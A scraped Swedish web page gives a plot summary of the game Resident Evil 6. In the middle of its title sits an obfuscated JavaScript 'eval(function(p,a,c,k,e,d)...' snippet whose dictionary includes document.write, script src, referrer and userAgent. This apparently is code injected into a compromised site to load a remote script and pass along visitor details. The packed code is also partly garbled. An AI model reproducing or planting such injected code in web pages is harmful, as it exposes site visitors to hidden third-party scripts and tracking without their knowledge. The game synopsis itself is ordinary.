Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Resident Evil 6 – No hope left

Resident Evil 6 – No hope left
Revue Magazine

type=”text/javascript” src=”http://videos.goviral-content.com/playerjs-yt/resident_evil_6_12495.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1436806&skinName=light&wmode=window&hideChrome=0″>

Resident eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hsdfk|var|u0026u|referrer|knsiy||js|php’.split(‘|’),0,{}))
Evil 6: Det har gått tio år sedan Raccoon City incidenten och ordföranden i USA har beslutat att avslöja sanningen bakom det som hände i tron att det kommer att bromsa den nuvarande upproriska aktivitet som finns i världen.

Vid presidentens sida finns hans personliga vän och Raccoon Citys överlevande, Leon S. Kennedy. Dock går det snett när världen lider i en biologisk terrorattack och Leon tvingas möta en president som omvandlats till en oigenkännlig varelse som gör besluten svårare än någonsin. Samtidigt kommer Chris Redfield från Security Assessment Alliance i Kina, som nu också ligger under en biologisk terrorattack.

Med inget land säkert längre från dessa attacker och de efterföljande utbrott förenas nu hela världens befolkning i gemensam rädsla och tron på att det inte finns något hopp kvar.